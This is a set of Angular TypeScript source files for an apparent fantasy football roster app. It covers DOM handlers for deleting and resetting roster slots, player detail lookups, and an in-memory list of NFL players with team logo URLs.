this.renderer.setAttribute(delete_player, 'id','p' + [i+1] + '-del');
this.renderer.setAttribute(delete_player, 'class','delete_player');
let roster_list = document.getElementById('roster_list')
this.renderer.appendChild(roster_list, load_player);
}
// create empty slot in table when delete button is clicked
let p1_del = document.getElementById('p1-del');
let player_li = this.el.nativeElement.children[0];
this.renderer.listen(p1_del, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(p, QB)
this.renderer.appendChild(player_li, p);
});
let p2_del = document.getElementById('p2-del');
let player2_li = this.el.nativeElement.children[1];
this.renderer.listen(p2_del, 'click', (event) => {
let childElements = Array.from(player2_li.children);
for (let child of childElements) {
this.renderer.removeChild(player2_li, child);
}
let p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(p, RB1)
this.renderer.appendChild(player2_li, p);
});
let p3_del = document.getElementById('p3-del');
let player3_li = this.el.nativeElement.children[2];
this.renderer.listen(p3_del, 'click', (event) => {
let childElements = Array.from(player3_li.children);
for (let child of childElements) {
this.renderer.removeChild(player3_li, child);
}
let p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(p, RB2)
this.renderer.appendChild(player3_li, p);
});
let p4_del = document.getElementById('p4-del');
let player4_li = this.el.nativeElement.children[3];
this.renderer.listen(p4_del, 'click', (event) => {
let childElements = Array.from(player4_li.children);
for (let child of childElements) {
this.renderer.removeChild(player4_li, child);
}
let p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(p, WR1)
this.renderer.appendChild(player4_li, p);
});
let p5_del = document.getElementById('p5-del');
let player5_li = this.el.nativeElement.children[4];
this.renderer.listen(p5_del, 'click', (event) => {
let childElements = Array.from(player5_li.children);
for (let child of childElements) {
this.renderer.removeChild(player5_li, child);
}
let p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(p, WR2)
this.renderer.appendChild(player5_li, p);
});
let p7_del = document.getElementById('p7-del');
let player7_li = this.el.nativeElement.children[6];
this.renderer.listen(p7_del, 'click', (event) => {
let childElements = Array.from(player7_li.children);
for (let child of childElements) {
this.renderer.removeChild(player7_li, child);
}
let p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(p, TE)
this.renderer.appendChild(player7_li, p);
});
let p6_del = document.getElementById('p6-del');
let player6_li = this.el.nativeElement.children[5];
this.renderer.listen(p6_del, 'click', (event) => {
let childElements = Array.from(player6_li.children);
for (let child of childElements) {
this.renderer.removeChild(player6_li, child);
}
let p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(p, WRT)
this.renderer.appendChild(player6_li, p);
});
}
deleteTeam(event: any) {
// this.teams = this.teams.filter(t => t !== this.team);
this.teamService.deleteTeam(this.team)
.subscribe();
this.teamService.getTeams()
.subscribe(teams => {
this.teams = teams;
this.teams.length == 0 ? this.team = null : this.team = this.teams[this.teams.length - 1];
});
console.log(this.teams);
alert("Team Deleted!");
}
resetTeam(event: any) {
// remove player elements and delete button for all positions, add text
let qb_li = this.el.nativeElement.children[0];
let qb_childElements = Array.from(qb_li.children);
for (let child of qb_childElements) {
this.renderer.removeChild(qb_li, child);
}
let qb_p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(qb_p, QB)
this.renderer.appendChild(qb_li, qb_p);
let rb1_li = this.el.nativeElement.children[1];
let rb1_childElements = Array.from(rb1_li.children);
for (let child of rb1_childElements) {
this.renderer.removeChild(rb1_li, child);
}
let rb1_p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(rb1_p, RB1);
this.renderer.appendChild(rb1_li, rb1_p);
let rb2_li = this.el.nativeElement.children[2];
let rb2_childElements = Array.from(rb2_li.children);
for (let child of rb2_childElements) {
this.renderer.removeChild(rb2_li, child);
}
let rb2_p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(rb2_p, RB2);
this.renderer.appendChild(rb2_li, rb2_p);
let wr1_li = this.el.nativeElement.children[3];
let wr1_childElements = Array.from(wr1_li.children);
for (let child of wr1_childElements) {
this.renderer.removeChild(wr1_li, child);
}
let wr1_p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(wr1_p, WR1);
this.renderer.appendChild(wr1_li, wr1_p);
let wr2_li = this.el.nativeElement.children[4];
let wr2_childElements = Array.from(wr2_li.children);
for (let child of wr2_childElements) {
this.renderer.removeChild(wr2_li, child);
}
let wr2_p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(wr2_p, WR2);
this.renderer.appendChild(wr2_li, wr2_p);
let te_li = this.el.nativeElement.children[6];
let te_childElements = Array.from(te_li.children);
for (let child of te_childElements) {
this.renderer.removeChild(te_li, child);
}
let te_p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(te_p, TE);
this.renderer.appendChild(te_li, te_p);
let wrt_li = this.el.nativeElement.children[5];
let wrt_childElements = Array.from(wrt_li.children);
for (let child of wrt_childElements) {
this.renderer.removeChild(wrt_li, child);
}
let wrt_p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(wrt_p, WRT);
this.renderer.appendChild(wrt_li, wrt_p);
}
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { Team } from '../shared/team';
import { TeamService } from "../services/team.service";
import { StatsService } from "../services/stats.service";
import { Router, ActivatedRoute, ParamMap } from '@angular/router';
@Component({
selector: 'app-teams',
templateUrl: './teams.component.html',
styleUrls: ['./teams.component.css']
})
export class TeamsComponent implements OnInit {
team: Team;
constructor(private teamService: TeamService, private route: ActivatedRoute, private statsService: StatsService ) { }
ngOnInit() { this.teamService.currentTeam
.subscribe(team => this.team = team);
}
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { Router, ActivatedRoute, ParamMap } from '@angular/router';
import { Player } from '../shared/player';
import { PlayerService } from "../services/player.service";
import { StatsService } from "../services/stats.service";
@Component({
selector: 'app-playerdetail',
templateUrl: './playerdetail.component.html',
styleUrls: ['./playerdetail.component.css']
})
export class PlayerDetailComponent implements OnInit {
player: Player;
players: Player[];
stats: any;
numbers: any;
QB: boolean = false;
RB: boolean = false;
WR: boolean = false;
TE: boolean = false;
constructor(private route: ActivatedRoute, private playerService: PlayerService, private statsService: StatsService) { }
ngOnInit() {
this.getPlayer();
}
getPlayer(): void {
const id = +this.route.snapshot.paramMap.get('id');
console.log(id);
this.playerService.getPlayer(id)
.subscribe(player => {
this.player = player
this.statsService.searchPlayer(this.player.name)
.subscribe(stats =>
this.stats = stats);
this.statsService.getStats(this.player.name)
.subscribe(numbers =>
this.numbers = numbers);
this.getPosition();
this.playerService.getPlayersByPosition(this.player.position)
.subscribe(players => this.players = players);
});
}
getSmallPlayer(id): void {
this.playerService.getPlayer(id)
.subscribe(player => {
this.player = player
this.statsService.searchPlayer(this.player.name)
.subscribe(stats =>
this.stats = stats);
this.statsService.getStats(this.player.name)
.subscribe(numbers =>
this.numbers = numbers);
this.getPosition();
});
}
getPosition() {
if (this.player.position == "QB") {
this.QB = true;
}
else if (this.player.position == "RB") {
this.RB = true;
}
else if (this.player.position == "WR") {
this.WR = true;
}
else if (this.player.position == "TE") {
this.TE = true;
}
}
}<file_sep>import { InMemoryDbService } from 'angular-in-memory-web-api';
import { Player } from '../shared/player';
import { Team } from '../shared/team';
import { Injectable } from '@angular/core';
@Injectable({
providedIn: 'root'
})
export class InMemoryDataService implements InMemoryDbService {
createDb() {
const players = [
{id: 1, name : "<NAME>", position : "QB", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 2, name : "<NAME>", position : "QB", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 3, name : "<NAME>", position : "QB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 4, name : "<NAME>", position : "QB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 5, name : "<NAME>", position : "QB", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 6, name : "<NAME>", position : "QB", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 7, name : "<NAME>", position : "QB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 8, name : "<NAME>", position : "QB", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 9, name : "<NAME>", position : "QB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 10, name : "<NAME>", position : "QB", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 11, name : "<NAME>", position : "QB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 12, name : "<NAME>", position : "QB", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 13, name : "<NAME>", position : "QB", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 14, name : "<NAME>", position : "QB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 15, name : "<NAME>", position : "QB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 16, name : "<NAME>", position : "QB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 17, name : "<NAME>", position : "QB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 18, name : "<NAME>", position : "QB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 19, name : "<NAME>", position : "QB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 20, name : "<NAME>", position : "QB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 21, name : "<NAME>", position : "QB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 22, name : "<NAME>", position : "QB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 23, name : "<NAME>", position : "QB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 24, name : "<NAME>", position : "QB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 25, name : "<NAME>", position : "RB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 26, name : "<NAME>", position : "RB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 27, name : "<NAME>", position : "RB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 28, name : "<NAME>", position : "RB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 29, name : "<NAME>", position : "RB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 30, name : "<NAME>", position : "RB", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 31, name : "<NAME>", position : "RB", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 32, name : "<NAME>", position : "RB", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 33, name : "<NAME>", position : "RB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 34, name : "<NAME>", position : "RB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 35, name : "<NAME>", position : "RB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 36, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 37, name : "<NAME>", position : "RB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 38, name : "<NAME>", position : "RB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 39, name : "<NAME>", position : "RB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 40, name : "<NAME>", position : "RB", team: "Jacksonville Jaguars", logo : "https://upload.wikimedia.org/wikipedia/en/7/74/Jacksonville_Jaguars_logo.svg", alt : "Jac"},
{id: 41, name : "<NAME>", position : "RB", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 42, name : "<NAME>", position : "RB", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 43, name : "<NAME>", position : "RB", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 44, name : "<NAME>", position : "RB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 45, name : "<NAME>", position : "RB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 46, name : "<NAME>", position : "RB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 47, name : "<NAME>", position : "RB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 48, name : "<NAME>", position : "RB", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 49, name : "<NAME>", position : "RB", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 50, name : "<NAME>", position : "RB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 51, name : "<NAME>", position : "RB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 52, name : "<NAME>", position : "RB", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 53, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 54, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 55, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 56, name : "<NAME>", position : "RB", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 57, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 58, name : "<NAME>", position : "RB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 59, name : "<NAME>", position : "RB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari" },
{id: 60, name : "<NAME>", position : "RB", team: "Miami Dolphins", logo : "https://upload.wikimedia.org/wikipedia/en/3/37/Miami_Dolphins_logo.svg", alt : "Mia"},
{id: 61, name : "<NAME>", position : "RB", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 62, name : "<NAME>", position : "RB", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 63, name : "<NAME>", position : "RB", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 64, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 65, name : "<NAME>", position : "RB", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 66, name : "<NAME>", position : "RB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 67, name : "<NAME>", position : "RB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 68, name : "<NAME>", position : "RB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 69, name : "<NAME>", position : "RB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 70, name : "<NAME>", position : "RB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 71, name : "<NAME>", position : "RB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 72, name : "<NAME>", position : "RB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 73, name : "<NAME>", position : "RB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 74, name : "<NAME>", position : "RB", team: "Denver Broncos", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 75, name : "<NAME>", position : "RB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 76, name : "<NAME>", position : "RB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 77, name : "<NAME>", position : "RB", team: "Denver Broncos", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 78, name : "<NAME>", position : "RB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 79, name : "<NAME>", position : "WR", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 80, name : "<NAME>", position : "WR", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 81, name : "<NAME>", position : "WR", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 82, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 83, name : "<NAME>", position : "WR", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 84, name : "<NAME>", position : "WR", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 85, name : "<NAME>", position : "WR", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 86, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 87, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 88, name : "<NAME>", position : "WR", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 89, name : "<NAME>", position : "WR", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 90, name : "<NAME>", position : "WR", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 91, name : "<NAME>", position : "WR", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 92, name : "<NAME>", position : "WR", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 93, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 94, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 95, name : "<NAME>", position : "WR", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 96, name : "<NAME>", position : "WR", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 97, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 98, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 99, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 100, name : "<NAME>", position : "WR", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 101, name : "<NAME>", position : "WR", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 102, name : "<NAME>", position : "WR", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 103, name : "<NAME>", position : "WR", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 104, name : "<NAME>", position : "WR", team: "Miami Dolphins", logo : "https://upload.wikimedia.org/wikipedia/en/3/37/Miami_Dolphins_logo.svg", alt : "Mia"},
{id: 105, name : "<NAME>", position : "WR", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 106, name : "<NAME>", position : "WR", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 107, name : "<NAME>", position : "WR", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 108, name : "<NAME>", position : "WR", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 109, name : "<NAME>", position : "WR", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 110, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 111, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 112, name : "<NAME>", position : "WR", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 113, name : "<NAME>", position : "WR", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 114, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 115, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 116, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 117, name : "<NAME>", position : "WR", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 118, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 119, name : "<NAME>", position : "WR", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 120, name : "<NAME>", position : "WR", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 121, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 122, name : "<NAME>", position : "WR", team: "Jacksonville Jaguars", logo : "https://upload.wikimedia.org/wikipedia/en/7/74/Jacksonville_Jaguars_logo.svg", alt : "Jac"},
{id: 123, name : "<NAME>", position : "WR", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 124, name : "<NAME>", position : "WR", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
